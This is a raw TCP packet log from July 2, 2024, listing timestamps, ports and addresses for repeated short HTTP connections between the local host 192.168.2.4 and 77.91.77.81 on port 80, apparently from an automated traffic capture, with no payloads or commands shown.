Jul 2, 2024 00:25:59.450670004 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.450771093 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.450957060 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.451040983 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.451220036 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.458172083 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.144156933 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.144223928 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.145042896 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.152024984 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.363490105 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.363657951 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.475224972 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.475562096 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.482494116 CEST	80	49785	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.482553959 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:00.482580900 CEST	49785	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.482650042 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.482901096 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:00.489260912 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.190731049 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.190859079 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.194610119 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.201541901 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.419979095 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.420147896 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.522068977 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.522464991 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.527395010 CEST	80	49786	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.527407885 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:01.527532101 CEST	49786	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.527596951 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.527718067 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:01.532496929 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.301826954 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.302000999 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.303034067 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.307835102 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.531218052 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.531328917 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.646981955 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.647350073 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.652131081 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.652159929 CEST	80	49787	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:02.652271986 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.652323961 CEST	49787	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.652535915 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:02.657301903 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:03.374509096 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:03.374622107 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.098298073 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.103602886 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:04.335345030 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:04.335478067 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.452423096 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.452806950 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.458096027 CEST	80	49788	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:04.458154917 CEST	49788	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.458343983 CEST	80	49789	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:04.458422899 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.495989084 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:04.501693964 CEST	80	49789	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.146099091 CEST	80	49789	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.146162033 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.180794001 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.181382895 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.187525988 CEST	80	49789	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.187583923 CEST	49789	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.187666893 CEST	80	49790	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.187736034 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.188023090 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.194462061 CEST	80	49790	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.885718107 CEST	80	49790	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.885787964 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.993539095 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.993993998 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.998565912 CEST	80	49790	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.998616934 CEST	49790	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.998755932 CEST	80	49791	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:05.998823881 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:05.998982906 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.004199982 CEST	80	49791	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:06.695009947 CEST	80	49791	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:06.695075035 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.698071003 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.698523045 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.703075886 CEST	80	49791	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:06.703135967 CEST	49791	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.703242064 CEST	80	49792	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:06.703536034 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.703619957 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:06.708316088 CEST	80	49792	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:07.433557034 CEST	80	49792	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:07.433619022 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.540715933 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.541327953 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.547300100 CEST	80	49792	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:07.547352076 CEST	49792	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.547614098 CEST	80	49793	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:07.547684908 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.547960997 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:07.554258108 CEST	80	49793	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:08.309590101 CEST	80	49793	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:08.309660912 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.312553883 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.312875986 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.319231033 CEST	80	49794	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:08.319294930 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.319535971 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.319875002 CEST	80	49793	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:08.319922924 CEST	49793	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:08.326721907 CEST	80	49794	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.030463934 CEST	80	49794	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.030569077 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.149493933 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.150165081 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.154783964 CEST	80	49794	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.154880047 CEST	49794	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.154954910 CEST	80	49795	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.155181885 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.155659914 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.160495043 CEST	80	49795	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.851804972 CEST	80	49795	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.851864100 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.855973959 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.856403112 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.860943079 CEST	80	49795	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.860996962 CEST	49795	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.861146927 CEST	80	49796	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:09.861232042 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.861485004 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:09.866265059 CEST	80	49796	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:10.644871950 CEST	80	49796	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:10.645143032 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.762854099 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.763256073 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.768044949 CEST	80	49796	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:10.768057108 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:10.768105030 CEST	49796	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.768134117 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.768449068 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:10.773180008 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:11.677237988 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:11.677376032 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:11.678893089 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:11.679130077 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:11.692898035 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:11.697783947 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:11.917973995 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:11.921582937 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.052340031 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.053066969 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.057554007 CEST	80	49797	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.057718039 CEST	49797	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.057807922 CEST	80	49798	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.058059931 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.058332920 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.063062906 CEST	80	49798	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.770845890 CEST	80	49798	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.770906925 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.775015116 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.775372982 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.780188084 CEST	80	49798	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.780203104 CEST	80	49799	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:12.780242920 CEST	49798	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.780301094 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.780452967 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:12.786365986 CEST	80	49799	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:13.509793997 CEST	80	49799	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:13.510004044 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.618340015 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.618674040 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.625478983 CEST	80	49799	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:13.625601053 CEST	49799	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.625703096 CEST	80	49800	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:13.625926018 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.626180887 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:13.632929087 CEST	80	49800	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.389738083 CEST	80	49800	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.389878035 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.392870903 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.393203974 CEST	49801	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.397960901 CEST	80	49800	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.397980928 CEST	80	49801	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.398081064 CEST	49800	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.398107052 CEST	49801	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.398348093 CEST	49801	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.403379917 CEST	80	49801	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.406327963 CEST	49801	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.525988102 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.530895948 CEST	80	49802	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:14.531110048 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.531630039 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:14.536375046 CEST	80	49802	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:15.261244059 CEST	80	49802	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:15.262485981 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.124799967 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.125474930 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.131716967 CEST	80	49802	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.131752968 CEST	80	49803	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.131771088 CEST	49802	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.131840944 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.134707928 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.141180992 CEST	80	49803	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.854368925 CEST	80	49803	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.854438066 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.963203907 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.963541985 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.969784021 CEST	80	49803	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.969824076 CEST	80	49804	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:16.969850063 CEST	49803	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.969906092 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.970205069 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:16.976516008 CEST	80	49804	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:17.686127901 CEST	80	49804	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:17.686187029 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.690789938 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.691679955 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.696299076 CEST	80	49804	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:17.696413994 CEST	49804	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.696438074 CEST	80	49805	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:17.696595907 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.696899891 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:17.701667070 CEST	80	49805	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:18.398189068 CEST	80	49805	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:18.398405075 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.510865927 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.512147903 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.516017914 CEST	80	49805	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:18.516971111 CEST	80	49806	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:18.517024040 CEST	49805	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.517050028 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.517333984 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:18.522032022 CEST	80	49806	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:19.234682083 CEST	80	49806	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:19.238532066 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.681865931 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.682708025 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.687134027 CEST	80	49806	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:19.687180042 CEST	49806	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.687464952 CEST	80	49807	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:19.687557936 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.689344883 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:19.695014000 CEST	80	49807	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:20.456578970 CEST	80	49807	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:20.456638098 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.573174953 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.573556900 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.578707933 CEST	80	49807	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:20.578757048 CEST	49807	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.578807116 CEST	80	49808	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:20.578866005 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.579199076 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:20.583975077 CEST	80	49808	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:21.299407959 CEST	80	49808	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:21.299464941 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.303622961 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.304105997 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.310208082 CEST	80	49809	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:21.310292959 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.310544014 CEST	80	49808	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:21.310595989 CEST	49808	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.311049938 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:21.317742109 CEST	80	49809	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.018337965 CEST	80	49809	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.020560980 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.142596006 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.143377066 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.150161982 CEST	80	49810	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.150268078 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.150703907 CEST	80	49809	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.150718927 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.150752068 CEST	49809	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.158122063 CEST	80	49810	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.836713076 CEST	80	49810	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.836817026 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.854320049 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.854650021 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.860841036 CEST	80	49810	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.861011982 CEST	80	49811	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:22.861268997 CEST	49810	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.861315966 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.866240025 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:22.872575998 CEST	80	49811	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:23.563111067 CEST	80	49811	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:23.563186884 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.729352951 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.731393099 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.736851931 CEST	80	49811	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:23.736906052 CEST	49811	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.738734007 CEST	80	49812	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:23.738811016 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.739320040 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:23.746521950 CEST	80	49812	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:24.449767113 CEST	80	49812	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:24.449816942 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.509536982 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.510059118 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.515269995 CEST	80	49812	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:24.515301943 CEST	80	49813	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:24.515336990 CEST	49812	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.515388012 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.659667969 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:24.664473057 CEST	80	49813	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:25.225718021 CEST	80	49813	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:25.225898981 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.441689014 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.445207119 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.448868990 CEST	80	49813	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:25.449558973 CEST	49813	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.451903105 CEST	80	49814	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:25.453563929 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.592184067 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:25.599483967 CEST	80	49814	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.179605007 CEST	80	49814	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.179672003 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.185776949 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.186260939 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.192594051 CEST	80	49815	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.192676067 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.192961931 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.193036079 CEST	80	49814	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.193089962 CEST	49814	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:26.199585915 CEST	80	49815	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.926578999 CEST	80	49815	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:26.927603006 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:27.045758009 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:27.046099901 CEST	49816	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:27.229485989 CEST	80	49816	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:27.229506016 CEST	80	49815	77.91.77.81	192.168.2.4
Jul 2, 2024 00:26:27.229619980 CEST	49815	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:27.229619980 CEST	49816	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:26:27.229995012 CEST	49816	80	192.168.2.4	77.91.77.81
